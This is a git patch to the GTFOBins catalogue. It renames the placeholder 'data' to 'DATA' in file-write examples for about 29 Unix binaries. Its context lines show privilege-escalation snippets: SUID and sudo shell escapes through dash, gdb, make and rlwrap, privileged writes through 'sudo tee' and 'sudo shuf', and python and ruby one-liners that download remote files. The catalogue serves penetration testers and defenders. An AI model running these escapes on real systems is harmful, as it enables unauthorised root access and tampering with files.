From d4b50275bb026af2205e8db0db4ddfc990db90cf Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 20 Aug 2018 14:35:43 +0200 Subject: [PATCH] Use DATA as a placeholder for file-write operations --- _data/functions.yml | 8 ++++---- _gtfobins/ash.md | 2 +- _gtfobins/awk.md | 2 +- _gtfobins/bash.md | 2 +- _gtfobins/busybox.md | 2 +- _gtfobins/csh.md | 2 +- _gtfobins/dash.md | 2 +- _gtfobins/dd.md | 2 +- _gtfobins/ed.md | 2 +- _gtfobins/emacs.md | 2 +- _gtfobins/gdb.md | 2 +- _gtfobins/ksh.md | 2 +- _gtfobins/lua.md | 2 +- _gtfobins/make.md | 2 +- _gtfobins/nano.md | 2 +- _gtfobins/pico.md | 2 +- _gtfobins/puppet.md | 2 +- _gtfobins/python2.md | 2 +- _gtfobins/python3.md | 2 +- _gtfobins/rlwrap.md | 2 +- _gtfobins/ruby.md | 2 +- _gtfobins/sed.md | 2 +- _gtfobins/shuf.md | 6 +++--- _gtfobins/sqlite3.md | 2 +- _gtfobins/tar.md | 2 +- _gtfobins/tee.md | 6 +++--- _gtfobins/vi.md | 2 +- _gtfobins/vim.md | 2 +- _gtfobins/xxd.md | 2 +- 29 files changed, 36 insertions(+), 36 deletions(-) diff --git a/_data/functions.yml b/_data/functions.yml index 59a6f60..ca15889 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -75,11 +75,11 @@ load-library: file-read: label: File read description: | - It reads files and may be used to do privileged reads or disclose files - outside a restricted file system. + It reads data from files, it may be used to do privileged reads or disclose + files outside a restricted file system. file-write: label: File write description: | - It writes files and may be used to do privileged writes or write files - outside a restricted file system. + It writes data to files, it may be used to do privileged writes or write + files outside a restricted file system. diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md index 61216d6..aee72f4 100644 --- a/_gtfobins/ash.md +++ b/_gtfobins/ash.md @@ -5,7 +5,7 @@ functions: file-write: - code: | export LFILE=file_to_write - ash -c 'echo data > $LFILE' + ash -c 'echo DATA > $LFILE' suid-enabled: - code: "./ash" sudo-enabled: diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 3bf4517..08816ab 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -22,7 +22,7 @@ functions: file-write: - code: | LFILE=file_to_write - awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' + awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }' file-read: - code: | LFILE=file_to_read diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 55f6814..e39d79d 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -39,7 +39,7 @@ functions: file-write: - code: | export LFILE=file_to_write - bash -c 'echo data > $LFILE' + bash -c 'echo DATA > $LFILE' file-read: - description: It trims trailing newlines and it's not binary-safe. code: | diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 7d22c7f..57ef0b9 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -12,7 +12,7 @@ functions: file-write: - code: | LFILE=file_to_write - busybox sh -c 'echo "data" > $LFILE' + busybox sh -c 'echo "DATA" > $LFILE' file-read: - code: | LFILE=file_to_read diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md index 07716b7..3c161bf 100644 --- a/_gtfobins/csh.md +++ b/_gtfobins/csh.md @@ -5,7 +5,7 @@ functions: file-write: - code: | export LFILE=file_to_write - ash -c 'echo data > $LFILE' + ash -c 'echo DATA > $LFILE' suid-enabled: - code: "./csh -b" sudo-enabled: diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md index b1dc72f..42facb4 100644 --- a/_gtfobins/dash.md +++ b/_gtfobins/dash.md @@ -5,7 +5,7 @@ functions: file-write: - code: | export LFILE=file_to_write - ash -c 'echo data > $LFILE' + ash -c 'echo DATA > $LFILE' suid-enabled: - code: ./dash -p sudo-enabled: diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md index c179268..79dfa97 100644 --- a/_gtfobins/dd.md +++ b/_gtfobins/dd.md @@ -3,7 +3,7 @@ functions: file-write: - code: | LFILE=file_to_write - echo "data" | dd of=$LFILE + echo "DATA" | dd of=$LFILE file-read: - code: | LFILE=file_to_read diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index f2c85c6..8ef61c9 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -8,7 +8,7 @@ functions: - code: | ed file_to_write a - data + DATA . w q diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md index 542f883..d04ba61 100644 --- a/_gtfobins/emacs.md +++ b/_gtfobins/emacs.md @@ -5,7 +5,7 @@ functions: file-write: - code: | emacs file_to_write - data + DATA C-x C-s file-read: - code: emacs file_to_read diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index 3718449..f864555 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -11,7 +11,7 @@ functions: file-write: - code: | LFILE=file_to_write - gdb -nx -ex "dump value $LFILE \"data\"" -ex quit + gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit sudo-enabled: - code: sudo gdb -nx -ex '!sh' -ex quit --- diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index 434607a..a16514e 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md @@ -39,7 +39,7 @@ functions: file-write: - code: | export LFILE=file_to_write - ksh -c 'echo data > $LFILE' + ksh -c 'echo DATA > $LFILE' file-read: - description: It trims trailing newlines. code: | diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index d2f45ef..82c68d8 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -56,7 +56,7 @@ functions: f:write(d); io.close(f);' file-write: - - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' + - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' file-read: - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' sudo-enabled: diff --git a/_gtfobins/make.md b/_gtfobins/make.md index 3a0f825..6f89ca6 100644 --- a/_gtfobins/make.md +++ b/_gtfobins/make.md @@ -9,7 +9,7 @@ functions: - description: Requires a newer GNU `make` version. code: | LFILE=file_to_write - make -s --eval="\$(file >$LFILE,data)" . + make -s --eval="\$(file >$LFILE,DATA)" . suid-enabled: - code: | COMMAND='/bin/sh -p' diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index 2bb21b9..8004167 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md @@ -12,7 +12,7 @@ functions: file-write: - code: | nano file_to_write - data + DATA ^O file-read: - code: nano file_to_read diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index c5c5c0b..e350ebf 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md @@ -12,7 +12,7 @@ functions: file-write: - code: | pico file_to_write - data + DATA ^O file-read: - code: pico file_to_read diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index 868bf80..55f3918 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md @@ -9,7 +9,7 @@ functions: - description: The file path must be absolute. code: | export LFILE="/tmp/file_to_write" - puppet apply -e "file { '$LFILE': content => 'data' }" + puppet apply -e "file { '$LFILE': content => 'DATA' }" file-read: - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed. code: | diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 28c27e6..d82049c 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -25,7 +25,7 @@ functions: export LFILE=file_to_save python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' file-write: - - code: python2 -c 'open("file_to_write","w+").write("data")' + - code: python2 -c 'open("file_to_write","w+").write("DATA")' file-read: - code: python2 -c 'open("file_to_read").read()' load-library: diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 960d00c..d340df1 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -25,7 +25,7 @@ functions: export LFILE=file_to_save python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' file-write: - - code: python3 -c 'open("file_to_write","w+").write("data")' + - code: python3 -c 'open("file_to_write","w+").write("DATA")' file-read: - code: python3 -c 'open("file_to_read").read()' load-library: diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md index fd3b8a6..7dd28f8 100644 --- a/_gtfobins/rlwrap.md +++ b/_gtfobins/rlwrap.md @@ -6,7 +6,7 @@ functions: - description: This adds timestamps to the output file. This relies on the external `echo` command. code: | LFILE=file_to_write - rlwrap -l "$LFILE" echo data + rlwrap -l "$LFILE" echo DATA suid-enabled: - code: ./rlwrap -H /dev/null /bin/sh -p sudo-enabled: diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index e24cc96..65c0d3c 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -22,7 +22,7 @@ functions: export LFILE=file_to_save ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' file-write: - - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' + - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' file-read: - code: ruby -e 'puts File.read("file_to_read")' load-library: diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index 987e56e..be83f84 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -9,7 +9,7 @@ functions: file-write: - code: | LFILE=file_to_write - sed -n "1s/.*/data/w $LFILE" /etc/hosts + sed -n "1s/.*/DATA/w $LFILE" /etc/hosts file-read: - code: | LFILE=file_to_read diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md index eedba39..7548a90 100644 --- a/_gtfobins/shuf.md +++ b/_gtfobins/shuf.md @@ -4,14 +4,14 @@ functions: file-write: - code: | LFILE=file_to_write - shuf -e data -o "$LFILE" + shuf -e DATA -o "$LFILE" suid-enabled: - description: code: | LFILE=file_to_write - ./shuf -e data -o "$LFILE" + ./shuf -e DATA -o "$LFILE" sudo-enabled: - code: | LFILE=file_to_write - sudo shuf -e data -o "$LFILE" + sudo shuf -e DATA -o "$LFILE" --- diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index 180edda..d826e24 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -5,7 +5,7 @@ functions: file-write: - code: | LFILE=file_to_write - sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' + sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";' file-read: - code: | LFILE=file_to_read diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index 73491e6..1cf26dd 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md @@ -10,7 +10,7 @@ functions: code: | LFILE=file_to_write TF=$(mktemp) - echo data > "$TF" + echo DATA > "$TF" tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P file-read: - description: This only works for GNU tar. diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index 9dca238..cee23f4 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -4,13 +4,13 @@ functions: file-write: - code: | LFILE=file_to_write - echo data | ./tee -a "$LFILE" + echo DATA | ./tee -a "$LFILE" suid-enabled: - code: | LFILE=file_to_write - echo data | ./tee -a "$LFILE" + echo DATA | ./tee -a "$LFILE" sudo-enabled: - code: | LFILE=file_to_write - echo data | sudo tee -a "$LFILE" + echo DATA | sudo tee -a "$LFILE" --- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index cdb505e..32842f6 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -9,7 +9,7 @@ functions: file-write: - code: | vi file_to_write - idata + iDATA ^[ w file-read: diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md index dbc0825..c2328e0 100644 --- a/_gtfobins/vim.md +++ b/_gtfobins/vim.md @@ -9,7 +9,7 @@ functions: file-write: - code: | vim file_to_write - idata + iDATA ^[ w file-read: diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md index 1ed5eff..3ef9d4a 100644 --- a/_gtfobins/xxd.md +++ b/_gtfobins/xxd.md @@ -3,7 +3,7 @@ functions: file-write: - code: | LFILE=file_to_write - echo data | xxd | xxd -r - "$LFILE" + echo DATA | xxd | xxd -r - "$LFILE" file-read: - code: | LFILE=file_to_read